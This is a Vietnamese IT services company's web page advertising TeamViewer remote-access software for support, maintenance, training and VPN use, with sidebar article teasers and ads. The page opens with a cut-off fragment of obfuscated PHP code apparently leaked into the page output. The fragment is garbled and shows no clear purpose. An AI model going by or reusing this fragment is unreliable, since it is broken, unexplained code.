=round(0+3))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][60]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.5+0.5)];if($GLOBALS['_1188104000_'][73]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.2+0.2+0.2+0.2+0.2)];if($GLOBALS['_1188104000_'][89]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][106]($_59) phan-mem-ho-tro-truy-cap-tu-xa-teamviewer | gioi-thieu-phan-mem
Công cụ
Đăng nhập

Công ty cổ phần Thương mại và Dịch vụ Kỹ thuật ITC

Bạn đang ở: Home » Giải pháp & Phần mềm » Giới thiệu phần mềm » Phần mềm hỗ trợ truy cập từ xa TeamViewer
Thứ năm, 28 Tháng 5 2015

Giới thiệu phần mềm

 • 1
 • 2
 • 3
Prev Next

10 ứng dụng ảo hóa giúp đơn giản hóa côn…

Nếu bạn chưa từng làm việc với một ứng dụng ảo hóa, bạn nên thử tìm hiểu qua một lần. Dưới đây là 10 ứng dụng ảo hóa sẽ giúp bạn hình dung được chúng có thể giúp ích gì cho bạn. Khi bạn cần triển khai nhanh một server để test hoặc một ứng dụng server, một trong các ý tưởng tốt nhất để thực hiện việc này là sử...

Chi tiết

Sử dụng Task và Appointment trong Outloo…

Sử dụng Task và Appointment trong Outlook

Microsoft Outlook 2007/2010 là một chương trình thuộc bộ ứng dụng Microsoft Office suite với tính năng gửi/nhận email kèm với tính năng hỗ trợ lập lịch và là một công cụ không thể thiếu được trong hoạt động hàng ngày tại doanh nghiệp. Nó hỗ trợ nhiều tài khoản email cùng lúc và cung cấp một To-Do Bar cho phép người dùng theo dõi các Task (nhiệm vụ) và...

Chi tiết

10 bổ sung đáng giá trên Office 2013

10 bổ sung đáng giá trên Office 2013

Office 2013 có nhiều thay đổi từ trong ra ngoài. Giao diện mang dáng dấp Windows 8, hỗ trợ đám mây SkyDrive, kết nối SharePoint, đồng bộ dữ liệu... Phiên bản hoàn chỉnh Office 2013 dự kiến sẽ phát hành ra thị trường vào giữa năm 2013. Tuy nhiên, với bản xem trước và bộ Office trên mây, Office 365, bạn có thể dễ dàng hình dung Office 2013 trông...

Chi tiết

Phần mềm hỗ trợ truy cập từ xa TeamViewer

Email In PDF.

Teamviewer SoftwarePhần mềm hỗ trợ truy cập từ xa TeamViewer là một công cụ mạnh, hoạt động nhanh chóng, được đóng gói dưới dạng module với các chức năng riêng biệt phù hợp cho từng mục đích sử dụng. Tính năng bảo mật mạnh mẽ làm cho người dùng Teamviewer yên tâm khi sử dụng. Đây là phần mềm chuyên dụng rất thích hợp cho các mục đích hỗ trợ khách hàng theo yêu cầu, bảo trì từ xa, trình diễn từ xa, làm việc nhóm và VPN.

Giải pháp trọn gói dễ dàng sử dụng cho hỗ trợ, làm việc nhóm và trình chiếu

 • Đem đến sự thích thú cho khách hàng của bạn với việc hỗ trợ tức thời, hiệu quả.
 • Kiểm soát các qui trình công việc phức tạp trong nhóm làm việc của bạn một cách dễ dàng.
 • Biến các cuộc điện thoại thảo luận bán hàng trở thành các buổi trình diễn sống động

TeamViewer là một giải pháp để dễ dàng để chia sẻ màn hình.

Với TeamViewer bạn có thể thiết lập kết nối tới bất kì máy tính nào thông qua Internet chỉ trong vài giây và điều khiển từ xa chiếc máy tính đó giống như khi bạn đang ngồi trước nó - mà không phải quan tâm gì về tường lửa, địa chỉ IP hoặc NAT.

 • Giải pháp trọn vẹn cho mọi trường hợp: Không giống như các giải pháp thông thường trên thị trường, TeamViewer kết hợp các công việc như hỗ trợ theo yêu cầu, bảo trì từ xa, trình diễn, làm việc nhóm và VPN trong một ứng dụng đơn nhất có khả năng đáp ứng tất cả các nhiệm vụ trên.
 • Hoạt động tốt sau tường lửa: Vấn đề lớn nhất trong việc sử dụng phần mềm bảo trì từ xa thường là tường lửa, các cổng bị vô hiệu hoá, bộ định tuyến NAT cho các địa chỉ IP nội bộ. Khi sử dụng TeamViewer bạn có thể quên đi những khó khăn này: TeamViewer vẫn tìm thấy máy tính của bạn thông qua tường lửa.
 • Đơn giản trong cài đặt và sử dụng: Không phải cài đặt hoặc cần phải có quyền quản trị trên máy tính của khách hàng. Khách hàng của bạn chỉ cần đơn giản thực hiện việc chạy một chương trình nhỏ và rồi để đó cho bạn thực hiện.
 • Giá rẻ không ngờ: TeamViewer có giá rẻ chưa từng có. Tất cả các chi phí đều chỉ phải mua một lần. Không mất phí hàng tháng hoặc phí phát sinh giống như các hợp đồng dịch vụ. Hãy tự mình tìm hiểu tại sao hàng triệu người sử dụng trên thế giới tin tưởng vào TeamViewer.
 • Phạm vi ứng dụng của TeamViewer:
  • Hỗ trợ theo yêu cầu - Spontaneous support
  • Bảo trì từ xa đối với máy chủ - Remote maintenance of unsupervised computers (servers)
  • Trình diễn từ xa - Online presentations, e.g. in sales
  • Đào tạo từ xa - Online training
  • Hoạt động theo nhóm - Team work
  • Văn phòng tại nhà - Home office
  • Truyền file qua internet - File transfer via Internet
  • Mạng riêng ảo - VPN

Hỗ trợ hiệu quả - không khác gì như khi bạn đang ở đó

TeamviewerBất kể điều gì bạn muốn thực hiện - TeamViewer chính là lợi thế cạnh tranh của bạn. Bạn có muốn cung cấp cho khách hàng của bạn dịch vụ hỗ trợ theo yêu cầu không? Hay đào tạo trực tuyến? Bạn cũng có thể trình diễn ý tưởng mới nhất của bạn một cách dễ dàng từ máy tính của mình.

Bảo trì từ xa

Bạn truy cập vào cái máy tính của khách hàng mà bạn cung cấp dịch vụ và có thể thực hiện bất cứ hoạt động gì, thậm chí là không cần có sự trợ giúp của ai đó đang ngồi trước máy tính.Xử lý sự cố từ xa với phần mềm Teamviewer

Hỗ trợ theo yêu cầu

Với TeamViewer bạn có thể nhìn thấy các trục trặc đang xảy ra trên máy tính của khách hàng ngay lập tức mà không cần khách hàng phải giải thích. Bạn thấy được những gì khách hàng của bạn thấy. Bạn có thể can thiệp ngay lập tức, tiếp quản quyền điều khiển và truyền các file tới máy tính ở xa hoặc cài đặt bản nâng cấp. Cùng lúc đó bạn có thể ghi lại các thay đổi và các thao tác của bạn một cách cẩn thận. Bạn có thể tiết kiệm chi phí và các lượt đi lại đáng kể trong tương lai.

Làm việc nhóm

Thế giới toàn cầu hoá kết nối các nhóm với nhau và luôn đòi hỏi thời gian đáp ứng nhanh nhất. TeamViewer cung cấp cho bạn khả năng truyền file hai chiều, đảo ngược hướng nhìn màn hình trong phiên làm việc, chat và nhiều thứ khác nữa. Nói cách khác, cung cấp mọi thứ bạn cần để làm việc trong đội-hình-hành-động-toàn-cầu.

Đào tạo trực tuyến

Các nhóm huấn luyện nhỏ thường hiệu quả hơn các khoá đào tạo suốt cả ngày. Bởi vì không mất chi phí thuê chỗ và đi lại, bạn có thể đề nghị các khoá đào tạo theo yêu cầu của khách hàng với trong tương lai với TeamViewer.

Trình diễn

TeamViewer cũng là phương tiện lý tưởng cho việc trình diễn với khách hàng. Chức năng này hỗ trợ các cuộc thảo luận bán hàng tức thời và thực hiện dễ dàng bằng việc trình diễn trực quan từ xa. Thay đổi hướng nhìn, phân tích trạng thái hiện thời và đưa ra các khả năng có thể xảy ra một cách tự nhiện. Không cần đặt phòng hội nghị, không mất phí đi lại, không mất thời gian đi lại - làm việc với TeamViewer rất hiệu quả.

VPN

TeamViewer cung cấp kênh VPN đúng nghĩa. Với cách kết nối này bạn không những điều khiển máy tính từ xa, mà còn có thể biến kết nối đó trở thành một phần của hệ thống mạng của bạn.Thêm bình luận


Mã bảo vệ Làm mới hình ảnh

Liên kết quảng cáo

Hộp mực in LaserPlus
Hộp mực tương thích LaserPlus chất lượng tương đương OEM với giá thành chỉ bằng 40-60%. Hãy dùng thử! Bạn sẽ bị thuyết phục bởi chất lượng và hài lòng với giá cả.
Dịch vụ PC Support
PC Support ServiceDịch vụ trọn gói hỗ trợ sử dụng và khắc phục sự cố máy tính dành cho gia đình. Mức giá chỉ từ 360,000đ/năm.

Hình thức tiếp thị nào làm bạn khó chịu nhất!